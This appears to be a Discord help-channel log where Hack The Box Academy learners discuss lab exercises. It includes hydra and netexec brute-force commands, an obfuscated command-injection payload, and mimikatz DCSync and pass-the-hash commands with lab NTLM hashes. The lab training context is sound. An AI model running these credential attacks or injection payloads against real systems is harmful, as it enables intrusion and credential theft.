Hey all, I'm currently doing the Login Brite Forcing module and am having trouble with Service Authentication Brute Forcing. I've cracked the b.gates creds with hydra but when I attempt to authenticate via ssh I get an error message Permission denied (publickey). How do I solve this?

I am doing password mutation exercise in password attacks module and I generated a lot of words using the provided password list and rule as prescribed and removed doubles using the provided command
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
But after over 15 minutes I got no hits brute forcing the SSH for the user sam
netexec ssh 10.129.207.211 -u sam -p mut_password.list

if you are having issue with the answer then hint you can't submit the $ thing as a part of the name lol but if you are having issue with RDP, from my note the *jack* user is one of the only user that can RDP i think

You're not supposed to use b.gates for this one, try using the employee name found in the previous assessment.

already try another way, i got s*
but now stuck in question 3

hint you are on the right path but cut the first 17000 words of your mutated wordlist

let move this part to DM to avoid spoiler if you still need help with that

ok

hey mate, thanks but it's the first question which specifies b.gates? "Using what you learned in this section, try to brute force the SSH login of the user "b.gates" in the target server shown above. Then try to SSH into the server. You should find a flag in the home dir. What is the content of the flag?"

The error I get is:
$ ssh b.gates@94.237.54.75
The authenticity of host '94.237.54.75 (94.237.54.75)' can't be established.
ECDSA key fingerprint is SHA256:vLawvWBkAM0HMyfB8uEnoXPFYuOJmJsTT4U7R0+ApSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '94.237.54.75' (ECDSA) to the list of known hosts.
b.gates@94.237.54.75: Permission denied (publickey).

Go after a different service

*with difference tools, cme and netexec can but isn't for brute forcing

Ssh isn't a good target service to brute when others are available

agreed, but on what every service brute forcing with netexec will be slow af

Other services can be faster than ssh :)

Enumeration is always the key to success

that is a good idea, some test faster

Can someone advise if my syntax is correct for smtp-user-enum?
I'm trying to increase the default seconds to wait for a reply but nothing I do seems to work.
The options within the pwn box version say its -w n which when i specify a number it errors, the online version on pentest monkey website says its -t.

this is how i've tried
smtp-user-enum -M VRFY -D <Domain> -U namelist.txt -t 10 <target-host>
smtp-user-enum -w 10 -M VRFY -D <Domain> -U namelist.txt -t <target-host>

The first executes but doesnt change the query timeout value, and the 2nd doesnt execute at all

Is VRFY enabled in the first instance?

yeah it works manually when i conenct over telnet

Specify -M vrfy, also I think it's a capital W for wait time, could be wrong though

huuuuuuh. it randomly worked wth

lower case w worked

Ouh marcie to the rescueee 🔥

but only if the -w 10 is specified after the -M VRFY option

it was upper case VRFY and lower case -w tbf, but putting the -w switch after the -M switch and it worked.

but thank you all anyway

Ye

Some tools are weird about ordering

is it 17k after removing the doubles or before? I have been at it for a little while and I am still not getting a hit

Removing the 17k after

the password Def exists ¯_(ツ)_/¯

I guess I'll just be more patient

With hydra I specified 48 threads

great, my hydra version does not seem to support smb2 and my netexec version does not seem to multi thread very much

I can't bear it any longer. The lab for this module (https://academy.hackthebox.com/module/112/section/1079) is performing very poor. Response time is very late and the RDP session keeps disconnecting and a click takes ton of time to actually respond. The NMAP scan was running for more than 1 hour with still 10% completion rate. It's been 3 days and I am not able to complete the lab even after knowing the solution because RDP session keeps on disconnecting because of network issue.
My internet is fine, do not suggest to check my internet.

Ftp should be open

hi

i need help

Switch regions/to tcp download

i think

it seemed rather slow, but I can give that a try

It helps if you say what your issue is

ping me if you can help me

Can't help you if we don't know what your problem is

i am making a machine my first machine

stuck in privilage esculation

You mean pwning/rooting

making my own machine for 200 dollar

This channel isn't for the app.hackthebox.com content, it's for academy content

Read #welcome on how to access more of the server

ok where should i go

inshort you can tell me

Seems like hydra is faster with multi threads than netexec, I got it now thanks

In short, you know how to read :) idk what channel would be better if you're making content

ok ok

i understand

Maybe #1024429874246590575 if other channels that are only accessible via linking your htb account to the discord aren't what you're looking for

Already did that.

¯_(ツ)_/¯

specifying the domain also gave me a load of false positives so took me far longer to get the result than it should have 😭

Yeah its tricky

Targets aren't spawning and the windows RDP was slow as hell also pivoting and tunneling is fubar seems like they have some issues to handle

Hello, can anyone help with the analysis machine?

Verify/link your account following #welcome and you can access #1198325761795428464 and ask there

Message support

Oh, I thought you were talking about the skill assessment

What did you use for your wordlist?

The warning of permission denied, makes me think they didn't specify the port to bruteforce on

Especially considering it's a public ip

thank you! you're right I had to specify the port as its not on 22, not had to use that flag before

HI, anyone knows why in https://academy.hackthebox.com/module/18/section/80 the question 2 htb-stu+ its not correct if its the user of the process? tyy

htb-stu+ is not the full name but it is cut off because there’s not enough space to display the full name (that’s why the + is there)

oh

I want to ask

During our examination of the USN Journal within Timeline Explorer, we observed "uninstall.exe". The attacker subsequently renamed this file. Use Zone.Identifier information to determine its new name and enter it as your answer.

Introduction to Digital Forensics - Rapid Triage Examination & Analysis Tools
I have used powershell to export the csv but Idk how to find the renamed file

Hi Guys im Stuck on the AD Skill Assessment 1:
Find cleartext credentials for another domain user. Submit the username as your answer.

I manged to RDP into MS01 but now i am completly lost

the spawning issue is driving me crazy, anyone is till having issue to spawn any lab machine?

dump everything

Hello, Having a problem with the "intro to assembly language module" on the "Debugging with GDB" witht eh "Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?" When I step through it before I even get to step 16 I get:
gef➤ si

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.

Any suggestions on what I am doing wrong?

I've tried re-dwnloading the gdb.zip file a couple times with no luck on getting further.

Dumped lsa, got the NTLM for tpetty hash. However when using hashcat i get no result. Any idea?

||sudo hashcat -m 1000 fd37b6fec5704cadabb319cebf9e3a3a /usr/share/wordlists/rockyou.txt||

find the clear text creds instead

where are you setting the break point?

_start

start+16 doesn't mean 16 steps from start, check the values in the stack/registers

please ask before dming

we can continue here, what do you have?

0x401010 <_start+16>: "H1\300"

read the question, what are they asking?

The hex in the rax at +16 that shows a 0x0

exactly

so find the hex value of the rax register, that's the answer

using the pwnbox, since it browser based, I noticed i cant efficently use certain hot keys

for example trying to use tmux and commands to split it vertically ( ctrl + B + " ) doesnt work

is there a way around this?

use a vm

Doesn't like the number it shows

stop before the _start+16 instruction

Ok I'm sitting here:

→ 0x40100a <_start+000a> xor rax, 0x21449
0x401010 <_start+0010> xor rax, rax

that's not where you should stop

top before the _start+16 instruction, then look at the rax register. that's it

The next step puts me here and the one after seg fault
→ 0x401013 add BYTE PTR [rax], a

that's after

next step
you're told previous step

hth

the arrow is at _start+16, means that's the next instruction

it's also given in the section

Note: the instruction shown with the -> symbol is where we are at, and it has not yet been processed.

One step and I am past itgef➤ b _start
gef➤ r
0x400ffe add BYTE PTR [rax], al
→ 0x401000 <_start+0000> movabs rax, 0x21796d6564616341
0x40100a <_start+000a> xor rax, 0x21449
0x401010 <_start+0010> xor rax, rax
gef➤ s
0x401000 <_start+0000> movabs rax, 0x21796d6564616341
0x40100a <_start+000a> xor rax, 0x21449
0x401010 <_start+0010> xor rax, rax
→ 0x401013 add BYTE PTR [rax], al
0x401015 add BYTE PTR [rax], al
0x401017 add BYTE PTR [rax], al

Hey everyone, I keep running logrotten and the exploit triggers but nothing ever gets written to /etc/bash_completion.d has anyone had this problem in the LPE module?

where should you be looking to see the value inside the rax register?

Yes, had some trouble with that. Got stuck for a long time before I got through it. DM

gef➤ x/wx 0x401010 ?

send a screenshot of your terminal

is that all you see? scroll up

that's also the wrong place to stop at

You want the registers?

what's the question asking? do you want the registers?

great, now you can see what's in rax, just go to the right instruction

also, your gef plugin probably didn't install probably, it's showing the instructions in base 16, you see _start+10, which is actually _start+16 in base 10

gef➤ print $rax
$1 = 0x0

step to the right instruction, and you don't have to print the register out, you can see what's in them in the screenshot above

How to login to use bloodhound??

there should be a provided password

in the module/section

a s will take me here: 0x401013 as I showed above

yea neo4j:HTB_@cademy_stdnt!

but it does not work

¯_(ツ)_/¯

go to the right instruction, then look here

which type of session should I use xorg?

idk

can you rdp to the target then run bloodhound from it?

si not s

I get this error when I try to login

¯_(ツ)_/¯

idk man

new error

If this was such a pain fo rme, I know serious hate is coming for the remainder of this module. 😒

I know its 3389

but xorg only has this

Hey guys, quick question here. How can be part of a group on htb labs? I am almost done with bug bounty path and I want to start doing more labs. I would like to be part of a team of my country... Venezuela

I mean in other words i want friends lmao

read the sections and understand them. it's also important to know the difference between registers, stack and memory addresses

you request to join a team on the labs thing

oh okok, thanks

it's as simple as that, this channel isn't really related to labs; read #welcome to find out how to access more of the server

thank u admin

not an admin

lmao

i know lmao. It was a small joke.. ❤️

lies

https://tenor.com/view/liar-gif-5182897

Shoutout to @errant moss for helping troubleshoot logrotten. You were a super big help.

Hello people

In the module network enumeration with nmap - submodule bypass security measures.

In the first example of firewall and ids / ips evasion

I've used some commands but I can't get the OS version

I too need some assistance with the thinking behind the JAVASCRIPT DEOBFUSCATION question: Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key?"

you'll need to unpack it

replace eval with print

Stuck on Basic Bypasses of File Inclusion, it every technique I have tried is either "Illegal path specified! " or nothing in the box? suggestions?

I finally figured it out, about 10 seconds after asking. I have been trying to figure out what you mean with this suggestion as I kept seeing it. I dont know how or where I would be replacing eval with print.

literally the first thing the minified/packed code has is eval(packed code)

using an online compiler you can do it pretty easy

i personally used programiz but i think the module has a fair few different ones

don't dm without asking btw

Right right, thank you for the rule reminder.

Okay i performed a dcsync with the tpetty user and got the Admin hash. Anyone know how i get the flag from the desktop?

you have DA, literally anything works

My DC Sync only gave me the NTLM Hash for Administrator, not a shell. How do i get a Shell on DC ?

pass the hash

How do i specify the DC as target for pth? I tried this so far without success:
||mimikatz # sekurlsa::pth /user:Administrator /domain:inlanefreight.htb /ntlm:27dedb1dab4d8545c6e1c66fba077da0||

refer to the pass the hash sections in password attacks

Looked it up still no success, here my output:
|| ```
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 4/11/2022 8:24:49 PM
Object Security ID : S-1-5-21-2270287766-1317258649-2146029398-500
Object Relative ID : 500

Credentials:
Hash NTLM: **
ntlm- **
ntlm- 1: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: 757743529af55e110994f3c7e3710fc9

mimikatz # sekurlsa::pth /user:Administrator /domain:inlanefreight.htb /ntlm:*++/run:cmd.exe
user : Administrator
domain : inlanefreight.htb
program : cmd.exe
impers. : no
NTLM : **
| PID 332
| TID 4116
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS``` ||

you should probably redact the hash from this btw

also it's easier to parse if you do ``` before and after the block

so it would be like
||```
output
```||

Hey yall, I'm having trouble finding the correct output of the following command: find /usr/share/ | grep root | grep mysql | tail -n 1

I've tried URL encoding, base64 encoding, substituting the spaces with %0a or %09. It seems that the DB is not recognizing any pipe commands, "|" or "<<<".
I've tried many commands but this is my current one > ip=127.0.0.1%0ab'as'hPDw8Cg$(ba'se'64%0a-dPDw8CgZmluZCAvdXNyL3NoYXJlLyAtbmFtZSAnKnJvb3QqJyAtbmFtZSAnKm15c3FsKicgfCB0YWlsIC1uIDEK)
https://academy.hackthebox.com/module/109/section/1039

done both 🙂

Nvm, I got it. Make sure there aren't any unwanted spaces at the beginning or end of you commands when encoding your payloads

Hey guys, i pivoted into a machine and also found creds to log into mssql and i have sysadmin role in mssql and i can see seImpersonatePrivilege is enabled and i can use xp_cmdshell, how can i get a rev shell from my own local computer?

i ssh into the first user then from that user i pivoted into the windows box

What are you working on?

I'm not quite sure but these seems like the creds for bloodhound and you are using them to try and rdp? I think you have the creds mixed up

Nice, i was just about to message you.

Going through the skills assessment of the same module now. Hopefully I can do it without any assistance fingers-crossed

Can you rdp with the hash?

Maybe win-rm or cme?

What module and section are you on?

AD Enumeration & Attacks - Skills Assessment Part II

Which question?

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host

in the pivoting tunneling module I have gained a shell with dnscat2 however it wont accept any of my commands it just gives me a prompt of exec (OFFICEMANAGER) 1>

I mean if you have admin for sql you can read files on its system

DId you get the "A**** "account

ik but when i type to see the directories for example xp_cmdshell dir C:\Users\Administrator\Desktop it shows permissions denied

ends with 20?

Yes